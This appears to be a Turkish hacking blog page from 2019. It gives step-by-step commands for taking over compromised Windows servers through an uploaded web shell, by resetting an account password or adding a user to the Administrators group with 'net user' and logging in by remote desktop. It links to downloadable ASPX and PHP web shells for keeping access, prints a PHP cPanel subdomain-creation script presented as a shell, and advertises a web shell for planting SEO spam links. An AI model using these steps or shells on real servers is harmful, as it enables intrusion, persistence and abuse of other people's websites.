Güncell Konular ;



Yöntem Yöntem Anlatıcağım Önce Başıt Olandan Başlayayım;



1- EN BASİT YOL:


Upload ettiğiniz shellin terminaline=

$ net user

komutunu girin çıkan kullanıcılardan birini kopyalayın sallıyorum kullanıcı B0RU70 Olsun komutu girip şifresini dğeiştiricez=

$ net user B0RU70 123456

Artından sunucu ip sini uzak masaüstü aracına yapıştırıp id pass ı yazıp sunucuya bağlanın artık rootsunuz.

2- USER EKLE YETKİ VER (BASİT YOL):


İlk önce "net stat" komutunu yazıpp çalştırıpından emin oluyoruz komut çalışıyosa=

$ net user B0RU70 123456!'^+%&/ /add

birdaha "net stat" yazdığımızda b0ru70 die bi kullanıcı oluşturmuş olucaz şimdi ona admin yetkisi verelimki bağlanabilelim=

$ net localgroup Administrators B0RU70 /add

bu yöntemde bu kadar basit.

3- ASPX SHELL KULLANMA:


Yukarda verdiğimim komutlar normal shellinizde çalışmıyorsa size verdiğim shelli indirip onunla çalıştırın ve rootsunuz :)

İNDİR:

1) https://pastebin.com/raw/zfAbgXLi

2) https://anonfile.com/U19fR9y2na/powershell_aspx

3) https://www.pastebinz.com/raw/CLxzmTRNgM



İyi hackingler..

Ayrıntılı Windows Server Rootlama

10 Temmuz 2019 Çarşamba



Öncelikle Bi saçmalığı bitirerek başlıyım makaleme windowsda mac de olduğu gibi linux dada rat ve virüsler bulunmakta anca windows daki kadar yaygın dğeil. yani linux a geçin virüs yemeyin tamamen uydurmadan ibarettir. ancak windows a kıyasla daha az zararlı yazılım olduğu için ve güvenlik sistemi çekirdeği daha gelişmiş olduğu için pentester ve avscan sistemlerinin kullandığı sistem genelde linux dur. Bu Soru işaretini giderdiğimize göre asıl konumuza geçelim;

Neden Linux Kullanıyorum,
Bundan 4 Yıl evvel zaten oyun oynamıyorum boş zaman kaybı diyip  programlamaya odaklandım tamamen ve elimdeki pc suanki kadar iyi olmaması sebebiyle windows da istediğim verimi alamyordum araştırmalarımla "Backbox" u kurdum hem tooları bulunduruyor hemde xfce gibi hafif birt masaüstü olduğu için pcmi artık daha verimli ve daha iyi kullanabiliyordum zamanla elim alıştı artık windows bir pc ye geçince cahil kalıcak hale gleiyorum tamamen linux os a odaklandım. bunun bana faydaları da oldu günümüzdeki hostlar linux genelde. sistemi ne kadar iyi tanırsan method üretmen ve olanları kavrayıp kullanman o kadar kolay oluyor.

Peki Linux a yeni başlayanlara hangi dağıtımları öneririm =

* Ubuntu
* Mint
* Backbox
* Parrot OS
* Fux

Yukarda Verdiğim OS Ları Kullanabilirsiniz.

İyi Şanslar..

Her server in yediği  " .php ve .phtml " uzantılarıyla kullanabilceğiniz bir shelldir. sitede kalıcı olmak istiyorsanız sitenin 2-3 yerine yedekleyip sonra bakmak için kullanabilirsiniz yada hiçbir shell yemiyorsa kullanırsınız.

PASTEBİN: https://www.pastebinz.com/raw/033BrEjM26


İNDİR:



B0RU70 MiNi Priv Shell

8 Temmuz 2019 Pazartesi

<?php



###############################################################

# cPanel Subdomains Creator 1.1

###############################################################

# Visit https://b0ru70.blogspot.com

###############################################################

#

# Can be used in 3 ways:

# 1. just open script in browser and fill the form

# 2. pass all info via url and form will not appear

# Sample: cpanel_subdomains.php?cpaneluser=USER&cpanelpass=PASSWORD&domain=DOMAIN&subdomain=SUBDOMAIN

# 3. list subdomains in file. In this case you must provide all the defaults below

#

# Note: you can omit any parameter, except "subdomain".

# When omitted, default value specified below will be taken

###############################################################



// cpanel user

define('CPANELUSER','user');



// cpanel password

define('CPANELPASS','pass');



// name of the subdomains list file.

// file format may be 1 column or 2 columns divided with semicilon (;)

// Example for two columns:

//   rootdomain1;subdomain1

//   rootdomain1;subdomain2

// Example for one columns:

//   subdomain1

//   subdomain2

define('INPUT_FILE','domains.txt');



// cPanel skin (mainly "x")

// Check http://www.zubrag.com/articles/determine-cpanel-skin.php

// to know it for sure

define('CPANEL_SKIN','x');



// Default domain (subdomains will be created for this domain)

// Will be used if not passed via parameter and not set in subdomains file

define('DOMAIN','');





/////////////// END OF INITIAL SETTINGS ////////////////////////

////////////////////////////////////////////////////////////////



function getVar($name, $def = '') {

  if (isset($_REQUEST[$name]) && ($_REQUEST[$name] != ''))

    return $_REQUEST[$name];

  else

    return $def;

}



$cpaneluser=getVar('cpaneluser', CPANELUSER);

$cpanelpass=getVar('cpanelpass', CPANELPASS);

$cpanel_skin = getVar('cpanelskin', CPANEL_SKIN);



if (isset($_REQUEST["subdomain"])) {

  // get parameters passed via URL or form, emulate string from file

  $doms = array( getVar('domain', DOMAIN) . ";" . $_REQUEST["subdomain"]);

  if (getVar('domain', DOMAIN) == '') die("You must specify domain name");

}

else {

  // open file with domains list

  $doms = @file(INPUT_FILE);

  if (!$doms) {

    // file does not exist, show input form

    echo "

Cannot find input file with subdomains information. It is ok if you are not creating subdomains from file.<br>

Tip: leave field empty to use default value you have specified in the script's code.<br>

<form method='post'>

 Subdomain:<input name='subdomain'><br>

 Domain:<input name='domain'><br>

 cPanel User:<input name='cpaneluser'><br>

 cPanel Password:<input name='cpanelpass'><br>

 cPanel Skin:<input name='cpanelskin'><br>

 <input type='submit' value='Create Subdomain' style='border:1px solid black'>

</form>";

    die();

  }

}



// create subdomain

function subd($host,$port,$ownername,$passw,$request) {



  $sock = fsockopen('localhost',2082);

  if(!$sock) {

    print('Socket error');

    exit();

  }



  $authstr = "$ownername:$passw";

  $pass = base64_encode($authstr);

  $in = "GET $request\r\n";

  $in .= "HTTP/1.0\r\n";

  $in .= "Host:$host\r\n";

  $in .= "Authorization: Basic $pass\r\n";

  $in .= "\r\n";



  fputs($sock, $in);

  while (!feof($sock)) {

    $result .= fgets ($sock,128);

  }

  fclose( $sock );



  return $result;

}



foreach($doms as $dom) {

  $lines = explode(';',$dom);

  if (count($lines) == 2) {

    // domain and subdomain passed

    $domain = trim($lines[0]);

    $subd = trim($lines[1]);

  }

  else {

    // only subdomain passed

    $domain = getVar('domain', DOMAIN);

    $subd = trim($lines[0]);

  }

  // http://[domainhere]:2082/frontend/x/subdomain/doadddomain.html?domain=[subdomain here]&rootdomain=[domain here]

  $request = "/frontend/$cpanel_skin/subdomain/doadddomain.html?rootdomain=$domain&domain=$subd";

  $result = subd('localhost',2082,$cpaneluser,$cpanelpass,$request);

  $show = strip_tags($result);

  echo $show;

}



?>

Sub domain açıcı shell

6 Temmuz 2019 Cumartesi

Hacklinker SEO Web Shell


Özelliklerini SS De görebilirsiniz Her Linux Sunucunun Yiceği Link Dostu Shell SEO CUlara Özel

İNDİR:


Hacklinker Shell (2019)

19 Haziran 2019 Çarşamba

// 2010- B0RU70 Se☪uЯity - Hacklink Al , B0RU70 \\